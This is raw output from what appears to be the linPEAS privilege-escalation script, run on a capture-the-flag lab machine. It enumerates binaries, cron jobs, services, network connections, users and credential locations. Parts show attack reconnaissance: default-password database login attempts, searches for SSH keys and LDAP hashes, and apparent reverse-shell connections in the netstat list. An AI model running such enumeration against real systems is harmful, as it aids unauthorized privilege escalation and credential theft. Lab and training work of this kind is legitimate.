    0 lrwxrwxrwx 1 [1;32mroot[0m root       20 May 31 20:53 /sbin/init -> /lib/[1;34msys[0mtemd/systemd
 2216 -rwxr-xr-x 1 [1;32mroot[0m root  2265104 May 31 20:48 /sbin/wpa_supplicant
  232 -rwxr-xr-x 1 [1;32mroot[0m root   236584 May 31 20:48 /usr/bin/dbus-[1;34mdaemon[0m
   20 -rwxr-xr-x 1 [1;32mroot[0m root    18760 May 31 20:49 /usr/bin/gnome-shell
   92 -rwxr-xr-x 1 [1;32mroot[0m root    92328 May 31 20:49 /usr/bin/[1;34mpulse[0maudio
    0 lrwxrwxrwx 1 [1;32mroot[0m root        9 May 31 20:48 /usr/bin/python3 -> python3.6
  128 -rwxr-xr-x 1 [1;32mroot[0m root   129248 May 31 20:48 /usr/bin/VGAuthService
   56 -rwxr-xr-x 1 [1;32mroot[0m root    55552 May 31 20:48 /usr/bin/vmtoolsd
   56 -rwxr-xr-x 1 [1;32mroot[0m root    56056 May 31 20:49 /usr/bin/[1;34mwhoopsie[0m
 2248 -rwxr-xr-x 1 [1;32mroot[0m root  2299608 May 31 20:49 /usr/bin/Xwayland
  180 -rwxr-xr-x 1 [1;32mroot[0m root   182552 May 31 20:48 /usr/lib/accountsservice/accounts-[1;34mdaemon[0m
   92 -rwxr-xr-x 1 [1;32mroot[0m root    91720 May 31 20:49 /usr/lib/at-spi2-core/at-spi2-registryd
   24 -rwxr-xr-x 1 [1;32mroot[0m root    22600 May 31 20:49 /usr/lib/at-spi2-core/at-spi-bus-launcher
  304 -rwxr-xr-x 1 [1;32mroot[0m root   309520 May 31 20:49 /usr/lib/[1;34mcolord[0m/colord
   96 -rwxr-xr-x 1 [1;32mroot[0m root    96536 May 31 20:49 /usr/libexec/xdg-permission-store
   64 -rwxr-xr-x 1 [1;32mroot[0m root    63712 May 31 20:49 /usr/lib/[1;34mgdm[0m3/gdm-wayland-session
  292 -rwxr-xr-x 1 [1;32mroot[0m root   297504 May 31 20:49 /usr/lib/gnome-session/gnome-session-binary
   20 -rwxr-xr-x 1 [1;32mroot[0m root    18712 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-a11y-settings
   28 -rwxr-xr-x 1 [1;32mroot[0m root    26904 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-clipboard
   80 -rwxr-xr-x 1 [1;32mroot[0m root    80216 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-color
   68 -rwxr-xr-x 1 [1;32mroot[0m root    68216 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-datetime
   44 -rwxr-xr-x 1 [1;32mroot[0m root    43736 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-housekeeping
   36 -rwxr-xr-x 1 [1;32mroot[0m root    35416 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-keyboard
  216 -rwxr-xr-x 1 [1;32mroot[0m root   219480 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-media-keys
   24 -rwxr-xr-x 1 [1;32mroot[0m root    22808 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-mouse
   92 -rwxr-xr-x 1 [1;32mroot[0m root    92488 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-power
   44 -rwxr-xr-x 1 [1;32mroot[0m root    43320 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-print-notifications
   40 -rwxr-xr-x 1 [1;32mroot[0m root    39192 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-rfkill
   24 -rwxr-xr-x 1 [1;32mroot[0m root    22808 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-screensaver-proxy
   32 -rwxr-xr-x 1 [1;32mroot[0m root    31000 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-sharing
   96 -rwxr-xr-x 1 [1;32mroot[0m root    96536 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-smartcard
   24 -rwxr-xr-x 1 [1;32mroot[0m root    22808 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-sound
   60 -rwxr-xr-x 1 [1;32mroot[0m root    59720 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-wacom
   64 -rwxr-xr-x 1 [1;32mroot[0m root    64952 May 31 20:49 /usr/lib/gnome-settings-[1;34mdaemon[0m/gsd-xsettings
   20 -rwxr-xr-x 1 [1;32mroot[0m root    18504 May 31 20:49 /usr/lib/ibus/ibus-dconf
   16 -rwxr-xr-x 1 [1;32mroot[0m root    14408 May 31 20:49 /usr/lib/ibus/ibus-engine-simple
   84 -rwxr-xr-x 1 [1;32mroot[0m root    84040 May 31 20:49 /usr/lib/ibus/ibus-portal
   96 -rwxr-xr-x 1 [1;32mroot[0m root    95944 May 31 20:49 /usr/lib/ibus/ibus-x11
  276 -rwxr-xr-x 1 [1;32mroot[0m root   280784 May 31 20:49 /usr/lib/packagekit/packagekitd
   16 -rwxr-xr-x 1 [1;32mroot[0m root    14552 May 31 20:48 /usr/lib/policykit-1/polkitd
   64 -rwxr-xr-x 1 [1;32mroot[0m root    63848 May 31 20:49 /usr/lib/[1;34m[1;32mrtkit[0m[0m/rtkit-daemon
18488 -rwxr-xr-x 1 [1;32mroot[0m root 18927720 May 31 20:48 /usr/lib/snapd/snapd
  432 -rwxr-xr-x 1 [1;32mroot[0m root   441840 May 31 20:48 /usr/lib/udisks2/udisksd
  244 -rwxr-xr-x 1 [1;32mroot[0m root   247880 May 31 20:49 /usr/lib/upower/upowerd
  192 -rwxr-xr-x 1 [1;32mroot[0m root   194888 Oct 30  2018 /usr/lib/x86_64-linux-gnu/boltd
   52 -rwxr-xr-x 1 [1;32mroot[0m root    52064 May 31 20:48 /usr/sbin/acpid
  656 -rwxr-xr-x 1 [1;32mroot[0m root   671392 May 31 20:49 /usr/sbin/apache2
   48 -rwxr-xr-x 1 [1;32mroot[0m root    47416 May 31 20:48 /usr/sbin/cron
  176 -rwxr-xr-x 1 [1;32mroot[0m root   178592 May 31 20:48 /usr/sbin/cups-browsed
  424 -rwxr-xr-x 1 [1;32mroot[0m root   432712 May 31 20:48 /usr/sbin/cupsd
  412 -rwxr-xr-x 1 [1;32mroot[0m root   420224 May 31 20:49 /usr/sbin/[1;34mgdm[0m3
   64 -rwxr-xr-x 1 [1;32mroot[0m root    64184 May 31 20:48 /usr/sbin/irqbalance
   28 -rwxr-xr-x 1 [1;32mroot[0m root    26616 May 31 20:49 /usr/sbin/kerneloops
 1404 -rwxr-xr-x 1 [1;32mroot[0m root  1436736 May  6  2019 /usr/sbin/ModemManager
24040 -rwxr-xr-x 1 [1;32mroot[0m root 24613992 May 31 20:49 /usr/sbin/[1;34mmysql[0md
 2600 -rwxr-xr-x 1 [1;32mroot[0m root  2659520 Mar 13 06:07 /usr/sbin/NetworkManager
  668 -rwxr-xr-x 1 [1;32mroot[0m root   680488 May 31 20:48 /usr/sbin/r[1;34m[1;32msyslog[0m[0md
  772 -rwxr-xr-x 1 [1;32mroot[0m root   786856 May 31 20:49 /usr/sbin/[1;34msshd[0m

[1;33m[+] [1;32mCron jobs
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
[0m-rw-r--r-- 1 root root  722 Nov 15  2017 /etc/crontab

/etc/cron.d:
total 32
drwxr-xr-x   2 root root  4096 Mar 13 06:08 .
drwxr-xr-x 127 root root 12288 Mar 20 15:27 ..
-rw-r--r--   1 root root   285 May 29  2017 anacron
-rw-r--r--   1 root root   712 Dec 17  2018 [1;32mphp[0m
-rw-r--r--   1 root root   102 Nov 15  2017 [1;32m.placeholder[0m
-rw-r--r--   1 root root   191 Oct 15  2019 [1;32mpopularity-contest[0m

/etc/cron.daily:
total 76
drwxr-xr-x   2 root root  4096 Mar 20 15:27 .
drwxr-xr-x 127 root root 12288 Mar 20 15:27 ..
-rwxr-xr-x   1 root root   311 May 29  2017 [1;32m0anacron[0m
-rwxr-xr-x   1 root root   539 Jul 16  2019 [1;32mapache2[0m
-rwxr-xr-x   1 root root   376 Nov 20  2017 [1;32mapport[0m
-rwxr-xr-x   1 root root  1478 Apr 20  2018 [1;32mapt-compat[0m
-rwxr-xr-x   1 root root   355 Dec 29  2017 [1;32mbsdmainutils[0m
-rwxr-xr-x   1 root root   384 Dec 12  2012 cracklib-runtime
-rwxr-xr-x   1 root root  1176 Nov  2  2017 [1;32mdpkg[0m
-rwxr-xr-x   1 root root   372 Aug 21  2017 [1;32mlogrotate[0m
-rwxr-xr-x   1 root root  1065 Apr  7  2018 [1;32mman-db[0m
-rwxr-xr-x   1 root root   538 Mar  1  2018 [1;32mmlocate[0m
-rwxr-xr-x   1 root root   249 Jan 25  2018 [1;32mpasswd[0m
-rw-r--r--   1 root root   102 Nov 15  2017 [1;32m.placeholder[0m
-rwxr-xr-x   1 root root  3477 Feb 20  2018 [1;32mpopularity-contest[0m
-rwxr-xr-x   1 root root   246 Mar 21  2018 [1;32mubuntu-advantage-tools[0m
-rwxr-xr-x   1 root root   214 Nov 12  2018 [1;32mupdate-notifier-common[0m

/etc/cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Aug  5  2019 .
drwxr-xr-x 127 root root 12288 Mar 20 15:27 ..
-rw-r--r--   1 root root   102 Nov 15  2017 [1;32m.placeholder[0m

/etc/cron.monthly:
total 24
drwxr-xr-x   2 root root  4096 Aug  5  2019 .
drwxr-xr-x 127 root root 12288 Mar 20 15:27 ..
-rwxr-xr-x   1 root root   313 May 29  2017 [1;32m0anacron[0m
-rw-r--r--   1 root root   102 Nov 15  2017 [1;32m.placeholder[0m

/etc/cron.weekly:
total 32
drwxr-xr-x   2 root root  4096 Aug  5  2019 .
drwxr-xr-x 127 root root 12288 Mar 20 15:27 ..
-rwxr-xr-x   1 root root   312 May 29  2017 [1;32m0anacron[0m
-rwxr-xr-x   1 root root   723 Apr  7  2018 [1;32mman-db[0m
-rw-r--r--   1 root root   102 Nov 15  2017 [1;32m.placeholder[0m
-rwxr-xr-x   1 root root   211 Nov 12  2018 [1;32mupdate-notifier-common[0m

SHELL=/bin/sh
PATH=/usr/local/s[1;34mbin:[0m/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin



SHELL=/bin/sh
PATH=/usr/local/s[1;34mbin:[0m/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/[1;31mroot[0m
LOGNAME=[1;31mroot[0m

1	5	cron.daily	run-parts --report /etc/cron.daily
7	10	cron.weekly	run-parts --report /etc/cron.weekly
@monthly	15	cron.monthly	run-parts --report /etc/cron.monthly

[1;33m[+] [1;32mServices
[0m[1;34m[i] [1;33mSearch for outdated versions
[0m [ + ]  acpid
 [ + ]  alsa-utils
 [ - ]  anacron
 [ + ]  apache-htcacheclean
 [ + ]  apache2
 [ + ]  apparmor
 [ + ]  apport
 [ + ]  avahi-daemon
 [ - ]  bluetooth
 [ - ]  console-setup.sh
 [ + ]  cron
 [ + ]  cups
 [ + ]  cups-browsed
 [ + ]  dbus
 [ - ]  dns-clean
 [ + ]  gdm3
 [ + ]  grub-common
 [ - ]  hwclock.sh
 [ + ]  irqbalance
 [ + ]  kerneloops
 [ - ]  keyboard-setup.sh
 [ + ]  kmod
 [ + ]  mysql
 [ + ]  network-manager
 [ + ]  networking
 [ + ]  open-vm-tools
 [ - ]  plymouth
 [ - ]  plymouth-log
 [ - ]  pppd-dns
 [ + ]  procps
 [ - ]  rsync
 [ + ]  rsyslog
 [ - ]  saned
 [ + ]  speech-dispatcher
 [ - ]  spice-vdagent
 [ + ]  ssh
 [ + ]  udev
 [ + ]  ufw
 [ + ]  unattended-upgrades
 [ - ]  uuidd
 [ + ]  whoopsie
 [ - ]  x11-common

[1;33m[+] [1;32mSystemd PATH
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path
[0mPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

[1;33m[+] [1;32mAnalyzing .service files
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#services
[0m[1;32mYou can't write on systemd PATH so I'm not going to list relative paths executed by services[0m

[1;33m[+] [1;32mSystem timers
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
[0mNEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Mon 2020-06-01 18:09:00 PDT  3min 26s left Mon 2020-06-01 17:39:08 PDT  26min ago    [1;32mphpsessionclean.timer[0m        phpsessionclean.service
Mon 2020-06-01 19:02:03 PDT  56min left    Mon 2020-06-01 18:01:10 PDT  4min 22s ago anacron.timer                anacron.service
Mon 2020-06-01 19:10:01 PDT  1h 4min left  Mon 2020-06-01 13:32:52 PDT  4h 32min ago [1;32mapt-daily.timer[0m              apt-daily.service
Mon 2020-06-01 21:03:49 PDT  2h 58min left Sun 2020-05-31 21:03:49 PDT  21h ago      [1;32msystemd-tmpfiles-clean.timer[0m systemd-tmpfiles-clean.service
Tue 2020-06-02 06:13:05 PDT  12h left      Mon 2020-06-01 06:17:30 PDT  11h ago      [1;32mapt-daily-upgrade.timer[0m      apt-daily-upgrade.service
Tue 2020-06-02 10:30:19 PDT  16h left      Mon 2020-06-01 14:40:09 PDT  3h 25min ago [1;32mmotd-news.timer[0m              motd-news.service
Mon 2020-06-08 00:00:00 PDT  6 days left   Mon 2020-06-01 00:00:23 PDT  18h ago      [1;32mfstrim.timer[0m                 fstrim.service
n/a                          n/a           n/a                          n/a          [1;32msnapd.snap-repair.timer[0m      snapd.snap-repair.service
n/a                          n/a           n/a                          n/a          [1;32mureadahead-stop.timer[0m        ureadahead-stop.service

[1;33m[+] [1;32mAnalyzing .timer files
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
[0m
[1;33m[+] [1;32mAnalyzing .socket files
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
[0m
[1;33m[+] [1;32mHTTP sockets
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
[0m
[1;33m[+] [1;32mD-Bus config files
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
[0m

[1;34m===================================( [1;32mNetwork Information[1;34m )====================================
[0m[1;33m[+] [1;32mHostname, hosts and DNS
[0mubuntu
127.0.0.1	localhost
127.0.1.1	ubuntu

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0

[1;33m[+] [1;32mContent of /etc/inetd.conf & /etc/xinetd.conf
[0m[1;90m/etc/inetd.conf Not Found
[0m
[1;33m[+] [1;32mNetworks and neighbours
[0m# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.185  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:1cdd  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:1cdd  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:1c:dd  txqueuelen 1000  (Ethernet)
        RX packets 74144  bytes 12839121 (12.8 MB)
        RX errors 0  dropped 475  overruns 0  frame 0
        TX packets 59426  bytes 82503311 (82.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 203023  bytes 14420377 (14.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 203023  bytes 14420377 (14.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         _gateway        0.0.0.0         UG    0      0        0 ens160
10.10.10.0      0.0.0.0         255.255.255.0   U     0      0        0 ens160
link-local      0.0.0.0         255.255.0.0     U     1000   0        0 ens160

[1;33m[+] [1;32mIptables rules
[0m[1;90miptables rules Not Found
[0m
[1;33m[+] [1;32mActive Ports
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
[0mActive Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 [1;31m127.0.0.1[0m:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 [1;31m127.0.0.1[0m:631           0.0.0.0:*               LISTEN      -                   
tcp        0      0 10.10.10.185:51672      10.10.14.177:9001       ESTABLISHED 19327/bash          
tcp        0      0 10.10.10.185:34168      10.10.14.168:4789       ESTABLISHED -                   
tcp        0      0 10.10.10.185:34164      10.10.14.168:4789       CLOSE_WAIT  -                   
tcp        0      0 10.10.10.185:51638      10.10.14.177:9001       CLOSE_WAIT  22151/less          
tcp        0      0 10.10.10.185:34158      10.10.14.168:4789       CLOSE_WAIT  -                   
tcp        0      0 10.10.10.185:44552      10.10.14.44:1234        CLOSE_WAIT  3661/bash           
tcp        0      0 10.10.10.185:44574      10.10.14.44:1234        CLOSE_WAIT  28648/bash          
tcp        0      0 10.10.10.185:34160      10.10.14.168:4789       CLOSE_WAIT  -                   
tcp        0      0 10.10.10.185:44560      10.10.14.44:1234        CLOSE_WAIT  28137/bash          
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:631                 :::*                    LISTEN      -                   
tcp6       1      0 10.10.10.185:80         10.10.14.177:35016      CLOSE_WAIT  -                   
tcp6       0      0 10.10.10.185:80         10.10.14.168:60998      ESTABLISHED -                   
tcp6       1      0 10.10.10.185:80         10.10.14.168:59056      CLOSE_WAIT  -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:631             0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:33752           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -                   
udp6       0      0 :::49193                :::*                                -                   
udp6       0      0 :::5353                 :::*                                -                   

[1;33m[+] [1;32mCan I sniff with tcpdump?
[0m[1;90mNo
[0m

[1;34m====================================( [1;32mUsers Information[1;34m )=====================================
[0m[1;33m[+] [1;32mMy user
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
[0muid=1000([1;96m[1;95mtheseus[0m[0m) gid=1000([1;96m[1;95mtheseus[0m[0m) groups=1000([1;96m[1;95mtheseus[0m[0m),100(users)

[1;33m[+] [1;32mDo I have PGP keys?
[0m
[1;33m[+] [1;32mClipboard or highlighted text?
[0m[1;90mxsel and xclip Not Found
[0m
[1;33m[+] [1;32mTesting 'sudo -l' without password & /etc/sudoers
[0m[1;34m[i] [1;33mhttps://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
[0m
[1;33m[+] [1;32mChecking /etc/doas.conf
[0m[1;90m/etc/doas.conf Not Found
[0m
[1;33m[+] [1;32mChecking Pkexec policy
[0m
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

[1;33m[+] [1;32mDo not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
[0m[1;33m[+] [1;32mDo not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
[0m
[1;33m[+] [1;32mSuperusers
[0m[1;31mroot[0m:x:0:0:root:/root:/bin/bash

[1;33m[+] [1;32mUsers with console
[0m[1;31mroot[0m:x:0:0:root:/root:/bin/bash
[1;96m[1;95mtheseus[0m[0m:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash

[1;33m[+] [1;32mAll users & groups
[0muid=0([1;31mroot[0m) gid=0[1;31m(root)[0m groups=0[1;31m(root)[0m
uid=1000([1;96m[1;95mtheseus[0m[0m) gid=1000([1;96m[1;95mtheseus[0m[0m) groups=1000([1;96m[1;95mtheseus[0m[0m),100(users)
uid=100([1;34msystemd-network[0m) gid=102([1;34msystemd-network[0m) groups=102([1;34msystemd-network[0m)
uid=101([1;34msystemd-resolve[0m) gid=103([1;34msystemd-resolve[0m) groups=103([1;34msystemd-resolve[0m)
uid=102([1;34m[1;32msyslog[0m[0m) gid=106([1;34m[1;32msyslog[0m[0m) groups=106([1;34m[1;32msyslog[0m[0m),4[1;32m(adm)[0m
uid=103([1;34mmessagebus[0m) gid=107([1;34mmessagebus[0m) groups=107([1;34mmessagebus[0m)
uid=104([1;34m_apt[0m) gid=65534[1;32m(nogroup)[0m groups=65534[1;32m(nogroup)[0m
uid=105([1;34muuidd[0m) gid=111([1;34muuidd[0m) groups=111([1;34muuidd[0m)
uid=106([1;34mavahi-autoipd[0m) gid=112([1;34mavahi-autoipd[0m) groups=112([1;34mavahi-autoipd[0m)
uid=107([1;34musbmux[0m) gid=46[1;32m(plugdev)[0m groups=46[1;32m(plugdev)[0m
uid=108([1;34mdnsmasq[0m) gid=65534[1;32m(nogroup)[0m groups=65534[1;32m(nogroup)[0m
uid=109([1;34m[1;32mrtkit[0m[0m) gid=114([1;34m[1;32mrtkit[0m[0m) groups=114([1;34m[1;32mrtkit[0m[0m)
uid=10([1;34muucp[0m) gid=10([1;34muucp[0m) groups=10([1;34muucp[0m)
uid=110([1;34mcups-pk-helper[0m) gid=116([1;34mlp[0madmin) groups=116([1;34mlp[0madmin)
uid=111([1;34mspeech-dispatcher[0m) gid=29(audio) groups=29(audio)
uid=112([1;34mwhoopsie[0m) gid=117([1;34mwhoopsie[0m) groups=117([1;34mwhoopsie[0m)
uid=113([1;34mkernoops[0m) gid=65534[1;32m(nogroup)[0m groups=65534[1;32m(nogroup)[0m
uid=114([1;34msaned[0m) gid=119([1;34msaned[0m) groups=119([1;34msaned[0m),118(scanner)
uid=115([1;34mpulse[0m) gid=120([1;34mpulse[0m) groups=120([1;34mpulse[0m),29(audio)
uid=116([1;34mavahi[0m) gid=122([1;34mavahi[0m) groups=122([1;34mavahi[0m)
uid=117([1;34mcolord[0m) gid=123([1;34mcolord[0m) groups=123([1;34mcolord[0m)
uid=118([1;34mhplip[0m) gid=7([1;34mlp[0m) groups=7([1;34mlp[0m)
uid=119([1;34mgeoclue[0m) gid=124([1;34mgeoclue[0m) groups=124([1;34mgeoclue[0m)
uid=120([1;34mgnome-initial-setup[0m) gid=65534[1;32m(nogroup)[0m groups=65534[1;32m(nogroup)[0m
uid=121([1;34mgdm[0m) gid=125([1;34mgdm[0m) groups=125([1;34mgdm[0m)
uid=122([1;34mmysql[0m) gid=127([1;34mmysql[0m) groups=127([1;34mmysql[0m)
uid=123([1;34msshd[0m) gid=65534[1;32m(nogroup)[0m groups=65534[1;32m(nogroup)[0m
uid=13([1;34mproxy[0m) gid=13([1;34mproxy[0m) groups=13([1;34mproxy[0m)
uid=1([1;34mdaemon[0m) gid=1([1;34mdaemon[0m) groups=1([1;34mdaemon[0m)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33([1;34m[1;32mwww-data[0m[0m) gid=33([1;34m[1;32mwww-data[0m[0m) groups=33([1;34m[1;32mwww-data[0m[0m)
uid=34([1;34mbackup[0m) gid=34([1;34mbackup[0m) groups=34([1;34mbackup[0m)
uid=38([1;34mlist[0m) gid=38([1;34mlist[0m) groups=38([1;34mlist[0m)
uid=39([1;34mirc[0m) gid=39([1;34mirc[0m) groups=39([1;34mirc[0m)
uid=3([1;34msys[0m) gid=3([1;34msys[0m) groups=3([1;34msys[0m)
uid=41([1;34mgnats[0m) gid=41([1;34mgnats[0m) groups=41([1;34mgnats[0m)
uid=4([1;34msync[0m) gid=65534[1;32m(nogroup)[0m groups=65534[1;32m(nogroup)[0m
uid=5([1;34mgames[0m) gid=60([1;34mgames[0m) groups=60([1;34mgames[0m)
uid=65534([1;34mnobody[0m) gid=65534[1;32m(nogroup)[0m groups=65534[1;32m(nogroup)[0m
uid=6([1;34mman[0m) gid=12([1;34mman[0m) groups=12([1;34mman[0m)
uid=7([1;34mlp[0m) gid=7([1;34mlp[0m) groups=7([1;34mlp[0m)
uid=8([1;34m[1;32mmail[0m[0m) gid=8([1;34m[1;32mmail[0m[0m) groups=8([1;34m[1;32mmail[0m[0m)
uid=9([1;34mnews[0m) gid=9([1;34mnews[0m) groups=9([1;34mnews[0m)

[1;33m[+] [1;32mLogin now
[0m 18:05:39 up 21:16,  0 users,  load average: 0.61, 0.18, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

[1;33m[+] [1;32mLast logons
[0m[1;96m[1;95mtheseus[0m[0m  pts/5        10.10.14.99      Mon Jun  1 11:40 - 11:58  (00:18)
[1;96m[1;95mtheseus[0m[0m  pts/6        10.10.14.99      Mon Jun  1 10:20 - 11:37  (01:17)

wtmp begins Mon Jun  1 10:20:31 2020

[1;33m[+] [1;32mLast time logon each user
[0mUsername         Port     From             Latest
[1;96m[1;95mtheseus[0m[0m          pts/5    10.10.14.99      Mon Jun  1 11:40:39 -0700 2020

[1;33m[+] [1;32mPassword policy
[0mPASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


[1;34m===================================( [1;32mSoftware Information[1;34m )===================================
[0m[1;33m[+] [1;32mMySQL version
[0m[1;90mmysql Not Found
[0m
[1;33m[+] [1;32mMySQL connection using default root/root ........... [0m[1;90mNo
[0m[1;33m[+] [1;32mMySQL connection using root/toor ................... [0m[1;90mNo
[0m[1;33m[+] [1;32mMySQL connection using root/NOPASS ................. [0m[1;90mNo
[0m[1;33m[+] [1;32mLooking for mysql credentials and exec
[0mFrom '/etc/[1;34mmysql[0m/mysql.conf.d/mysqld.cnf' Mysql user: user		= mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/

[1;33m[+] [1;32mPostgreSQL version and pgadmin credentials
[0m[1;90m Not Found
[0m
[1;33m[+] [1;32mPostgreSQL connection to template0 using postgres/NOPASS ........ [0m[1;90mNo
[0m[1;33m[+] [1;32mPostgreSQL connection to template1 using postgres/NOPASS ........ [0m[1;90mNo
[0m[1;33m[+] [1;32mPostgreSQL connection to template0 using pgsql/NOPASS ........... [0m[1;90mNo
[0m[1;33m[+] [1;32mPostgreSQL connection to template1 using pgsql/NOPASS ........... [0m[1;90mNo
[0m
[1;33m[+] [1;32mApache server info
[0mVersion: Server version: Apache/2.4.29 (Ubuntu)
Server built:   2020-03-13T12:26:16

[1;33m[+] [1;32mLooking for PHPCookies
[0m[1;90m Not Found
[0m
[1;33m[+] [1;32mLooking for Wordpress wp-config.php files
[0m[1;90mwp-config.php Not Found
[0m
[1;33m[+] [1;32mLooking for Drupal settings.php files
[0m[1;90m/default/settings.php Not Found
[0m
[1;33m[+] [1;32mLooking for Tomcat users file
[0m[1;90mtomcat-users.xml Not Found
[0m
[1;33m[+] [1;32mMongo information
[0m[1;90m Not Found
[0m
[1;33m[+] [1;32mLooking for supervisord configuration file
[0m[1;90msupervisord.conf Not Found
[0m
[1;33m[+] [1;32mLooking for cesi configuration file
[0m[1;90mcesi.conf Not Found
[0m
[1;33m[+] [1;32mLooking for Rsyncd config file
[0m/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
	comment = public archive
	path = /var/www/pub
	use chroot = yes
	lock file = /var/lock/rsyncd
	read only = yes
	list = yes
	uid = nobody
	gid = nogroup
	strict modes = yes
	ignore errors = no
	ignore nonreadable = yes
	transfer logging = no
	timeout = 600
	refuse options = checksum dry-run
	dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz

[1;33m[+] [1;32mLooking for Hostapd config file
[0m[1;90mhostapd.conf Not Found
[0m
[1;33m[+] [1;32mLooking for wifi conns file
[0m/etc/NetworkManager/system-connections/
/etc/NetworkManager/system-connections/Wired connection 1

[1;33m[+] [1;32mLooking for Anaconda-ks config files
[0m[1;90manaconda-ks.cfg Not Found
[0m
[1;33m[+] [1;32mLooking for .vnc directories and their passwd files
[0m[1;90m.vnc Not Found
[0m
[1;33m[+] [1;32mLooking for ldap directories and their hashes
[0m/etc/ldap
The password hash is from the {SSHA} to 'structural'

[1;33m[+] [1;32mLooking for .ovpn files and credentials
[0m[1;90m.ovpn Not Found
[0m
[1;33m[+] [1;32mLooking for ssl/ssh files
[0m/home/theseus/.ssh/authorized_keys   /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
Port 22
PasswordAuthentication no
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
[1;31mPossible private SSH keys were found![0m
[1;31m/etc/ImageMagick-6/mime.xml[0m
  --> Some certificates were found (out limited):
/etc/pki/fwupd/LVFS-CA.pem
/etc/pki/fwupd-metadata/LVFS-CA.pem

 --> /etc/hosts.allow file found, read the rules:



Looking inside /etc/ssh/ssh_config for interesting info
[1;31mHost[0m *
    SendEnv LANG LC_*
    HashKnown[1;31mHost[0ms yes
    GSSAPIAuthentication yes

[1;33m[+] [1;32mLooking for unexpected auth lines in /etc/pam.d/sshd
[0m[1;90mNo
[0m
